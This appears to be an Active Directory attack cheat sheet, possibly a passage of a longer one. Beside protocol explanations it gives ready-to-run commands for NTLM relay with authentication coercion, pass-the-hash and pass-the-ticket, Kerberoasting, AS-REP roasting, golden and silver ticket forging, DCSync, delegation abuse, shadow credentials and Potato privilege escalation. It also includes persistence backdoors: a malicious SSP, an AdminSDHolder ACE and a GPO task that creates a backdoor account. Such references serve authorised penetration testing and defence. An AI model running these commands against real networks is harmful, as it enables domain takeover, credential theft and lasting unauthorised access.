# WPAD file example (wpad.dat)
function FindProxyForURL(url, host) {
    return "PROXY 192.168.1.50:8080";
}

---

Authentication

GSS-API/SSPI

Generic Security Service API / Security Support Provider Interface - an abstraction layer for authentication.

Windows SSPs

Security Support Providers implement authentication protocols.

Kerberos SSP

Default for domain authentication.

• Ticket-based

• Mutual authentication

• Requires KDC (Domain Controller)

NTLM SSP

Legacy challenge-response authentication.

• Password hash-based

• No mutual authentication

• Works without DC connectivity

Negotiate SSP

Negotiates between Kerberos and NTLM.

• Prefers Kerberos

• Falls back to NTLM

• Most common SSP used

Digest SSP

HTTP Digest authentication.

• Requires reversible encryption

• Rarely used in AD

Secure Channel SSP

SSL/TLS authentication (Schannel).

• Certificate-based

• Machine authentication

Cred SSP

Credential delegation for RDP/WinRM.

• Sends credentials to server

• Dangerous if server compromised

Custom SSPs

Third-party or malicious SSPs.

• Can capture credentials

• Persistence mechanism

# Add malicious SSP (persistence)
mimikatz # misc::memssp

# SSP DLL locations
HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages
HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages

SPNEGO

Simple and Protected GSSAPI Negotiation Mechanism.

• Wraps GSS-API negotiation

• Used by Negotiate SSP

• Seen in HTTP (WWW-Authenticate: Negotiate)

NTLM

NT LAN Manager - challenge-response authentication protocol.

NTLM Basics

NTLM Authentication Flow:

1. Client sends NEGOTIATE message (supported features)

2. Server sends CHALLENGE message (random 8/16 byte challenge)

3. Client sends AUTHENTICATE message (response using password hash)

NTLMv1

Security: Weak, vulnerable to rainbow tables.

Response = DES(NT_Hash, Challenge)

• 24-byte response

• Uses DES with NT hash as key

• Can be cracked to recover NT hash

NTLMv2

Security: Better, but still relay-vulnerable.

Response = HMAC-MD5(NT_Hash, Username + Domain + Challenge + Client_Challenge + Timestamp)

• Variable length response

• Includes timestamp (replay protection)

• Username/domain in calculation

MIC

Message Integrity Code - prevents relay message tampering.

• HMAC-MD5 of all three NTLM messages

• Optional flag in NTLMv2

• Can be removed by attacker (drop flag)

NTLM in Active Directory

NTLM is used when:

• Kerberos unavailable (no DC, IP instead of hostname)

• Legacy systems

• Cross-forest authentication (sometimes)

• Local account authentication

NTLM Attacks

NTLM Recon

# Identify NTLM endpoints
nmap -p 445,80,443,5985 --script http-ntlm-info,smb-security-mode 192.168.1.1

# Get NTLM challenge info
crackmapexec smb 192.168.1.1

# HTTP NTLM info
curl -I --ntlm -u : http://target/

NTLM Brute-Force

# Spray passwords
crackmapexec smb 192.168.1.1 -u users.txt -p 'Summer2024!' -d domain

# Hydra
hydra -L users.txt -P passwords.txt smb://192.168.1.1

# With hash
crackmapexec smb 192.168.1.1 -u users.txt -H hashes.txt -d domain

Pass the Hash

Use NT hash directly without cracking.

# Impacket tools
psexec.py -hashes :NTHASH domain/user@target
wmiexec.py -hashes :NTHASH domain/user@target
smbexec.py -hashes :NTHASH domain/user@target

# CrackMapExec
crackmapexec smb target -u user -H NTHASH -d domain -x "whoami"

# Evil-WinRM
evil-winrm -i target -u user -H NTHASH

# Mimikatz (Windows)
sekurlsa::pth /user:user /domain:domain /ntlm:NTHASH /run:cmd.exe

# Overpass the hash (NTLM to Kerberos)
getTGT.py -hashes :NTHASH domain/user

NTLM Relay

Relay captured NTLM authentication to another service.

# Setup relay
ntlmrelayx.py -tf targets.txt -smb2support

# Relay to LDAP (for delegation attacks)
ntlmrelayx.py -t ldap://dc.domain.com --delegate-access

# Relay to SMB with command execution
ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"

# Trigger authentication (printer bug)
printerbug.py domain/user:password@source target_listener

# PetitPotam (no creds needed for some versions)
petitpotam.py listener target

# Trigger with Responder poisoning
responder -I eth0 -rv
ntlmrelayx.py -tf targets.txt -smb2support

NTLM Relay Protections

Protection	Description	Bypass
SMB Signing	Signs SMB packets	Cannot relay to SMB signing required hosts
LDAP Signing	Signs LDAP packets	Cannot relay to LDAP
LDAP Channel Binding	Ties to TLS channel	Cannot relay to LDAPS
EPA (Extended Protection)	Channel binding for HTTP	Cannot relay across channels
Session Security	NTLMv2 session security	-

# Check SMB signing
crackmapexec smb 192.168.1.0/24 --gen-relay-list nosigning.txt
nmap -p445 --script smb-security-mode 192.168.1.0/24

# Check LDAP signing
crackmapexec ldap dc.domain.com -u user -p pass -M ldap-checker

NTLM Hashes Cracking

# Hashcat
hashcat -m 1000 -a 0 hashes.txt rockyou.txt  # NT hash
hashcat -m 5500 -a 0 hashes.txt rockyou.txt  # NTLMv1
hashcat -m 5600 -a 0 hashes.txt rockyou.txt  # NTLMv2

# John
john --format=nt hashes.txt --wordlist=rockyou.txt
john --format=netntlm hashes.txt --wordlist=rockyou.txt
john --format=netntlmv2 hashes.txt --wordlist=rockyou.txt

# Online services (be careful with sensitive hashes)
# crackstation.net, hashes.com

Kerberos

Kerberos is the default authentication protocol in Active Directory.

Kerberos Basics

Kerberos Principals

Principals identify entities in Kerberos.

Format	Example	Description
User	user@DOMAIN.COM	User principal
Service	service/host@DOMAIN.COM	Service principal
SPN	MSSQLSvc/sql.domain.com:1433	Service Principal Name

Tickets

Encrypted data structures proving identity.

PAC

Privilege Attribute Certificate - embedded in tickets, contains:

• User SID

• Group memberships

• User rights

• Signed by KDC (krbtgt key + service key)

Kerberos Actors

Actor	Role
Client	Requests authentication
KDC (Key Distribution Center)	Domain Controller, issues tickets
AS (Authentication Service)	Part of KDC, issues TGTs
TGS (Ticket Granting Service)	Part of KDC, issues service tickets
Service	Target service

Ticket Types

ST (Service Ticket)

• Used to access a specific service

• Encrypted with the service account's key

• Contains PAC and session key

TGT (Ticket Granting Ticket)

• Used to request service tickets

• Encrypted with the krbtgt account's key

• Proves user identity to KDC

Ticket Acquisition

1. AS-REQ: Client → KDC (username, timestamp encrypted with user key)
2. AS-REP: KDC → Client (TGT encrypted with krbtgt key)
3. TGS-REQ: Client → KDC (TGT + requested service)
4. TGS-REP: KDC → Client (ST encrypted with service key)
5. AP-REQ: Client → Service (ST)
6. AP-REP: Service → Client (optional mutual auth)

Kerberos Services

Service	Port	Description
kerberos	88/TCP,UDP	Main Kerberos protocol
kpasswd	464/TCP,UDP	Password changes

Kerberos Keys

Key Type	AES-256	AES-128	RC4 (NT Hash)
krbtgt	Golden ticket	Golden ticket	Golden ticket
Service account	Silver ticket	Silver ticket	Silver ticket
User	Authentication	Authentication	Pass the hash

Kerberos Basic Attacks

Kerberos Brute-Force

# Kerbrute
kerbrute bruteuser -d domain.com --dc dc.domain.com passwords.txt username
kerbrute passwordspray -d domain.com --dc dc.domain.com users.txt 'Summer2024!'
kerbrute userenum -d domain.com --dc dc.domain.com users.txt

# Rubeus
Rubeus.exe brute /password:Summer2024! /domain:domain.com

# No pre-auth enumeration (doesn't lock accounts)
GetNPUsers.py domain.com/ -usersfile users.txt -no-pass -dc-ip dc.domain.com

Kerberoast

Request service tickets for SPNs, crack offline.

# Impacket
GetUserSPNs.py domain.com/user:password -dc-ip dc.domain.com -request

# Rubeus
Rubeus.exe kerberoast /outfile:hashes.txt

# PowerView
Invoke-Kerberoast -OutputFormat Hashcat | Select-Object Hash | Out-File hashes.txt

# Crack
hashcat -m 13100 -a 0 hashes.txt rockyou.txt
john --format=krb5tgs hashes.txt --wordlist=rockyou.txt

Targeted Kerberoast (set SPN on the user you control):

# Requires GenericAll/GenericWrite on target user
Set-ADUser -Identity targetuser -ServicePrincipalNames @{Add='any/spn'}

ASREProast

Target accounts without pre-authentication required.

# Find vulnerable accounts
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true}

# Request AS-REP without password
GetNPUsers.py domain.com/ -usersfile users.txt -no-pass -dc-ip dc.domain.com -format hashcat

# Rubeus
Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt

# Crack
hashcat -m 18200 -a 0 hashes.txt rockyou.txt

Targeted ASREProast (disable pre-auth on the user you control):

# Requires GenericAll/GenericWrite on target user
Set-ADAccountControl -Identity targetuser -DoesNotRequirePreAuth $true

Pass the Key/Over Pass the Hash

Use Kerberos keys/NT hash to obtain TGT.

# Request TGT with hash
getTGT.py -hashes :NTHASH domain/user
getTGT.py -aesKey AES256KEY domain/user

# Use TGT
export KRB5CCNAME=user.ccache
psexec.py -k -no-pass domain/user@target

# Rubeus
Rubeus.exe asktgt /user:user /rc4:NTHASH /ptt
Rubeus.exe asktgt /user:user /aes256:AES256KEY /ptt

# Mimikatz
sekurlsa::pth /user:user /domain:domain /ntlm:NTHASH /run:cmd
sekurlsa::pth /user:user /domain:domain /aes256:AES256KEY /run:cmd

Pass the Ticket

Use stolen Kerberos tickets.

# Export tickets (Windows)
mimikatz # sekurlsa::tickets /export
Rubeus.exe dump

# Convert ticket formats
ticketConverter.py ticket.kirbi ticket.ccache
ticketConverter.py ticket.ccache ticket.kirbi

# Use ticket (Linux)
export KRB5CCNAME=/path/to/ticket.ccache
klist
psexec.py -k -no-pass domain/user@target

# Use ticket (Windows)
Rubeus.exe ptt /ticket:ticket.kirbi
mimikatz # kerberos::ptt ticket.kirbi

Golden/Silver Ticket

Golden Ticket: Forged TGT using krbtgt hash.

# Get krbtgt hash
mimikatz # lsadump::dcsync /domain:domain.com /user:krbtgt
secretsdump.py domain/admin:password@dc.domain.com -just-dc-user krbtgt

# Create golden ticket
ticketer.py -nthash KRBTGT_NTHASH -domain-sid S-1-5-21-... -domain domain.com administrator
mimikatz # kerberos::golden /user:administrator /domain:domain.com /sid:S-1-5-21-... /krbtgt:NTHASH /ptt

# With AES keys (harder to detect)
ticketer.py -aesKey KRBTGT_AES256 -domain-sid S-1-5-21-... -domain domain.com administrator

Silver Ticket: Forged ST using service account hash.

# Get service account hash (computer account for HOST/CIFS)
secretsdump.py domain/admin:password@target.domain.com

# Create silver ticket
ticketer.py -nthash SERVICE_NTHASH -domain-sid S-1-5-21-... -domain domain.com -spn cifs/target.domain.com administrator
mimikatz # kerberos::golden /user:administrator /domain:domain.com /sid:S-1-5-21-... /target:target.domain.com /service:cifs /rc4:NTHASH /ptt

# Common services: cifs, http, mssql, wsman, ldap, host

Kerberos Across Domains

SID History Attack

Inject privileged SIDs from another domain into the ticket.

# Golden ticket with extra SIDs (Enterprise Admin)
ticketer.py -nthash KRBTGT_NTHASH -domain-sid S-1-5-21-CHILD... -domain child.domain.com -extra-sid S-1-5-21-PARENT...-519 administrator

mimikatz # kerberos::golden /user:administrator /domain:child.domain.com /sid:S-1-5-21-CHILD... /krbtgt:NTHASH /sids:S-1-5-21-PARENT...-519 /ptt

Note: SID filtering may block this across forest trusts.

Inter-realm TGT

Request TGT for parent/trusted domain using trust key.

# Get trust key
mimikatz # lsadump::dcsync /domain:child.domain.com /user:PARENT$
secretsdump.py child.domain.com/admin:password@dc.child.domain.com -just-dc-user 'PARENT$'

# Create inter-realm TGT
ticketer.py -nthash TRUST_KEY -domain-sid S-1-5-21-CHILD... -domain child.domain.com -spn krbtgt/PARENT.DOMAIN.COM administrator

# Then request ST in parent domain using inter-realm TGT

Kerberos Delegation

Delegation allows services to impersonate users to other services.

Kerberos Anti-Delegation Measures

Protection	Effect
NOT_DELEGATED flag	Account cannot be delegated
Protected Users group	No delegation, no NTLM, no DES
Account is sensitive	Cannot be delegated

# Find protected accounts
Get-ADUser -Filter {AccountNotDelegated -eq $true}
Get-ADGroupMember "Protected Users"

Kerberos Unconstrained Delegation

Service stores user's TGT for any service.

# Find unconstrained delegation
Get-ADComputer -Filter {TrustedForDelegation -eq $true} -Properties TrustedForDelegation
Get-ADUser -Filter {TrustedForDelegation -eq $true} -Properties TrustedForDelegation

# BloodHound query
MATCH (c:Computer {unconstraineddelegation:true}) RETURN c

Attack: Coerce privileged user to authenticate, steal TGT.

# Monitor for tickets on compromised host with unconstrained delegation
Rubeus.exe monitor /interval:1

# Coerce DC authentication (Printer Bug)
SpoolSample.exe dc.domain.com attackerhost.domain.com
printerbug.py domain/user:password@dc.domain.com attackerhost.domain.com

# PetitPotam
PetitPotam.py attackerhost.domain.com dc.domain.com

# Use captured TGT
Rubeus.exe ptt /ticket:base64ticket

Kerberos Unconstrained Delegation Across Forests

If trust allows TGT delegation, can capture TGTs from users in trusted forest.

Kerberos Constrained Delegation

Service can only delegate to specific SPNs.

# Find constrained delegation
Get-ADUser -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo
Get-ADComputer -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo

# BloodHound query
MATCH (u)-[:AllowedToDelegate]->(c) RETURN u,c

S4U2proxy

Request ST on behalf of user to allowed service.

S4U2self

Request ST to self on behalf of any user (if TRUSTED_TO_AUTH_FOR_DELEGATION).

S4U2self and S4U2proxy

Combined flow for full delegation without user interaction.

S4U Attacks

# If you control account with constrained delegation to service
# Request ticket for admin to that service

# getST.py
getST.py -spn cifs/target.domain.com -impersonate administrator domain/serviceaccount:password
export KRB5CCNAME=administrator.ccache

# Rubeus
Rubeus.exe s4u /user:serviceaccount /rc4:NTHASH /impersonateuser:administrator /msdsspn:cifs/target.domain.com /ptt

Alternative Service Attack: If delegated to time/target, request cifs/target instead.

# Service name in ticket isn't validated by all services
Rubeus.exe s4u /user:serviceaccount /rc4:NTHASH /impersonateuser:administrator /msdsspn:time/target.domain.com /altservice:cifs /ptt

Resource-Based Constrained Delegation (RBCD)

Delegation controlled by target service (msDS-AllowedToActOnBehalfOfOtherIdentity).

# If you can write to target's RBCD attribute
# And you control an account with SPN

# Add RBCD
rbcd.py -delegate-from 'controlledaccount$' -delegate-to 'target$' -dc-ip dc.domain.com domain/user:password

# PowerShell
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-...-1234)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Set-ADComputer target -Replace @{'msDS-AllowedToActOnBehalfOfOtherIdentity'=$SDBytes}

# Request ticket
getST.py -spn cifs/target.domain.com -impersonate administrator domain/controlledaccount:password -dc-ip dc.domain.com

---

Logon Types

Different logon types have different credential caching behaviour.

Type	Name	Credentials Cached	Description
2	Interactive	Yes (NT hash, Kerberos keys)	Console logon
3	Network	No	SMB, authenticated network
4	Batch	Yes	Scheduled tasks
5	Service	Yes	Service startup
8	NetworkCleartext	Yes (plaintext available)	IIS Basic auth
9	NewCredentials	Current + new	RunAs /netonly
10	RemoteInteractive	Yes	RDP
11	CachedInteractive	Domain cached creds	Offline domain logon

Interactive Logon

Physical/console logon. Credentials cached in LSASS.

Network Logon

SMB, remote access. Credentials NOT cached on target.

Batch Logon

Scheduled tasks. Credentials may be stored.

Service Logon

Service accounts. Credentials cached.

NetworkCleartext Logon

Plaintext over network (IIS Basic). Credentials cached in plaintext.

NewCredentials Logon

runas /netonly. Current token locally, different creds for network.

RemoteInteractive Logon

RDP. Full credentials cached unless Restricted Admin/Remote Credential Guard.

---

Authorization

ACLs

Access Control Lists determine who can access/modify objects.

Security Descriptor

Contains:

• Owner: Who owns the object

• DACL: Discretionary ACL (permissions)

• SACL: System ACL (auditing)

ACEs

Access Control Entries - individual permission rules.

ACE Type	Description
Allow	Grants permission
Deny	Explicitly denies

Rights

Right	Description	Attack Use
GenericAll	Full control	Modify anything
GenericWrite	Write properties	Modify SPNs, delegation
WriteProperty	Write specific property	Targeted modification
WriteDacl	Modify ACL	Grant yourself GenericAll
WriteOwner	Change owner	Take ownership, then WriteDacl
Self	Modify self	Add self to group
AllExtendedRights	All extended rights	Reset password, read LAPS
ForceChangePassword	Reset password	Take over account
AddMember	Add to group	Add self to privileged group
ReadLAPSPassword	Read LAPS	Get local admin password

# Enumerate ACLs
Import-Module ActiveDirectory
(Get-Acl "AD:CN=user,CN=Users,DC=domain,DC=com").Access

# BloodHound
# Shows attack paths via ACL abuse

# PowerView
Get-ObjectAcl -SamAccountName user -ResolveGUIDs
Find-InterestingDomainAcl -ResolveGUIDs

ACL Attacks

Attack	Required Right	Action
Force password reset	ForceChangePassword	Set-ADAccountPassword
Add to group	AddMember/Self	Add-ADGroupMember
Set SPN (Kerberoast)	GenericWrite	Set-ADUser -ServicePrincipalNames
Disable pre-auth	GenericWrite	Set-ADAccountControl -DoesNotRequirePreAuth
Configure delegation	GenericWrite	Set delegation attributes
DCSync	Replicating Directory Changes (All)	secretsdump.py, mimikatz dcsync
Shadow Credentials	GenericWrite on computer	Add msDS-KeyCredentialLink

# Force password change
net user targetuser NewPassword123! /domain
Set-ADAccountPassword -Identity targetuser -Reset -NewPassword (ConvertTo-SecureString "NewPassword123!" -AsPlainText -Force)

# Add to group
Add-ADGroupMember -Identity "Domain Admins" -Members attacker

# Shadow Credentials attack
certipy shadow auto -u user@domain.com -p password -account targetcomputer$
pywhisker.py -d domain.com -u user -p password --target targetcomputer$ --action add

AdminSDHolder

Protects privileged accounts by resetting ACLs every 60 minutes.

# Find AdminSDHolder-protected objects
Get-ADObject -Filter {adminCount -eq 1}

# Backdoor: Add ACE to AdminSDHolder, propagates to all protected objects
Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=domain,DC=com" -PrincipalIdentity attacker -Rights All

Privileges

User rights assigned via Group Policy.

Privilege	Risk	Attack
SeBackupPrivilege	High	Backup files, read DC database
SeRestorePrivilege	High	Restore files, write anywhere
SeTakeOwnershipPrivilege	High	Take ownership of any object
SeDebugPrivilege	Critical	Debug processes (inject into LSASS)
SeImpersonatePrivilege	Critical	Impersonate tokens (Potato attacks)
SeAssignPrimaryTokenPrivilege	Critical	Assign process tokens
SeLoadDriverPrivilege	Critical	Load kernel drivers
SeTcbPrivilege	Critical	Act as part of OS
SeEnableDelegationPrivilege	High	Configure delegation

# Check privileges
whoami /priv

# Potato attacks (SeImpersonate)
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c net user attacker Password123! /add"
PrintSpoofer.exe -i -c cmd
GodPotato.exe -cmd "cmd /c whoami"

---

Group Policy

Group Policy Objects (GPOs) apply configuration to users and computers.

GPO Scope

Scope	Applied To
Site	AD site
Domain	Entire domain
OU	Organizational Unit (cascades)

Processing order: Local → Site → Domain → OU (LSDOU)

Group Policy Template

Files in SYSVOL (\domain\SYSVOL\domain\Policies{GUID}).

Machine\
  Preferences\Groups\Groups.xml      # Local group membership
  Preferences\ScheduledTasks\        # Scheduled tasks
  Preferences\Services\Services.xml  # Service configuration
  Scripts\Startup\                   # Startup scripts
  Scripts\Shutdown\                  # Shutdown scripts
User\
  Preferences\                       # User preferences
  Scripts\Logon\                     # Logon scripts
  Scripts\Logoff\                    # Logoff scripts

Group Policy Container

LDAP object storing GPO metadata.

# Enumerate GPOs
Get-GPO -All
Get-ADObject -Filter {objectClass -eq "groupPolicyContainer"}

# Find GPO links
Get-GPLink

GPO Attacks

# GPO with write access - add malicious scheduled task or startup script
SharpGPOAbuse.exe --AddComputerTask --TaskName "Backdoor" --Author domain\user --Command "cmd.exe" --Arguments "/c net user backdoor Password123! /add" --GPOName "Vulnerable GPO"

# Find GPOs with weak permissions
Get-NetGPO | Get-ObjectAcl | ? {$_.ActiveDirectoryRights -match "GenericAll|GenericWrite|WriteProperty|WriteDacl"}

---

Communication Protocols

SMB

Server Message Block - file sharing, named pipes, RPC transport.

Shares

Default Shares

Share	Description
C$	Default admin share (C: drive)
ADMIN$	%SystemRoot%
IPC$	Named pipes
PRINT$	Printer drivers

Default Domain Shares

Share	Path	Content
NETLOGON	%SystemRoot%\SYSVOL\sysvol\domain\SCRIPTS	Logon scripts
SYSVOL	%SystemRoot%\SYSVOL\sysvol	GPOs, scripts

# Enumerate shares
smbclient -L //target -U user%password
crackmapexec smb target -u user -p password --shares
smbmap -H target -u user -p password

Named Pipes

IPC mechanism over SMB (\\.\pipe\pipename).

Pipe	Service	Attack Use
\PIPE\srvsvc	Server service	Share enumeration
\PIPE\samr	SAM	User enumeration
\PIPE\lsarpc	LSA	Policy enumeration
\PIPE\netlogon	Netlogon	ZeroLogon
\PIPE\spoolss	Print Spooler	PrintNightmare, coercion
\PIPE\efsrpc	EFS	PetitPotam
\PIPE\drsuapi	Directory Replication	DCSync

HTTP

Web services in an AD environment.

Service	Port	Usage
ADFS	443	Federation
ADCS Web Enrollment	80/443	Certificate requests
Exchange OWA	443	Email
SharePoint	80/443	Collaboration

RPC

Remote Procedure Call - invoke functions remotely.

RPC over SMB

Transport via named pipes (port 445).

RPC over TCP

Dynamic ports (RPC Endpoint Mapper on 135).

# RPC enumeration
rpcclient -U 'domain/user%password' target
rpcclient $> enumdomusers
rpcclient $> enumdomgroups
rpcclient $> queryuser 0x1f4

# rpcdump
rpcdump.py domain/user:password@target

WinRM

Windows Remote Management - WS-Management protocol.

Port	Protocol
5985	HTTP
5986	HTTPS

# Test connectivity
Test-WSMan -ComputerName target

# Evil-WinRM
evil-winrm -i target -u user -p password
evil-winrm -i target -u user -H NTHASH

# CrackMapExec
crackmapexec winrm target -u user -p password -x "whoami"

PowerShell Remoting

Uses WinRM for remote PowerShell sessions.

Trusted Hosts

Clients must trust non-domain targets.

# View trusted hosts
Get-Item WSMan:\localhost\Client\TrustedHosts

# Add trusted host
Set-Item WSMan:\localhost\Client\TrustedHosts -Value "target" -Force

SSH

Secure Shell - increasingly common in Windows environments.

# Windows OpenSSH (Windows 10+)
ssh user@target

# With domain credentials
ssh domain\\user@target

SSH Tunneling

# Local port forward
ssh -L localport:remotehost:remoteport user@jumphost

# Dynamic SOCKS proxy
ssh -D 9050 user@jumphost

# Remote port forward
ssh -R remoteport:localhost:localport user@target

# ProxyChains through SOCKS
proxychains nmap -sT -p 445 192.168.1.1

RDP

Remote Desktop Protocol - graphical remote access.

Port	Description
3389	Standard RDP

# Linux clients
xfreerdp /u:user /p:password /v:target
rdesktop target

# Pass the hash (Restricted Admin mode required)
xfreerdp /u:user /pth:NTHASH /v:target

# Enable Restricted Admin (requires admin)
reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0

# Session hijacking (if SYSTEM on target)
query user
tscon <session_id> /dest:console

---

Quick Reference Card

Enumeration

Task	Command
Domain info	Get-ADDomain
All users	Get-ADUser -Filter *
All computers	Get-ADComputer -Filter *
All groups	Get-ADGroup -Filter *
Domain Controllers	Get-ADDomainController -Filter *
Trusts	Get-ADTrust -Filter *
SPNs	Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
LDAP query	ldapsearch -x -H ldap://dc -b "dc=domain,dc=com"

Credential Attacks

Attack	Command
DCSync	secretsdump.py domain/user:password@dc
Kerberoast	GetUserSPNs.py domain/user:password -request
ASREProast	GetNPUsers.py domain/ -usersfile users.txt -no-pass
Pass the hash	psexec.py -hashes :NTHASH domain/user@target
Golden ticket	ticketer.py -nthash KRBTGT_HASH -domain-sid SID -domain DOMAIN admin
Silver ticket	ticketer.py -nthash SERVICE_HASH -domain-sid SID -domain DOMAIN -spn cifs/target admin

Lateral Movement

Method	Command
PsExec	psexec.py domain/user:password@target
WMIExec	wmiexec.py domain/user:password@target
Evil-WinRM	evil-winrm -i target -u user -p password
RDP	xfreerdp /u:user /p:password /v:target
PowerShell	Enter-PSSession -ComputerName target -Credential domain\user

Common Ports

Port	Service
53	DNS
88	Kerberos
135	RPC Endpoint Mapper
139	NetBIOS Session
389	LDAP
445	SMB
464	Kerberos Password
636	LDAPS
3268	Global Catalog
3269	Global Catalog SSL
3389	RDP
5985	WinRM HTTP
5986	WinRM HTTPS

---

Tools Summary

Category	Tools
Enumeration	BloodHound, PowerView, ADRecon, ldapsearch, rpcclient
Credential Extraction	Mimikatz, pypykatz, secretsdump.py, LaZagne
Kerberos	Rubeus, Impacket (getTGT, getST, GetUserSPNs), kerbrute
Lateral Movement	Impacket suite, CrackMapExec, Evil-WinRM, PsExec
Relay/Poisoning	Responder, ntlmrelayx, Inveigh, mitm6
Privilege Escalation	PowerUp, PrivescCheck, Certify, Certipy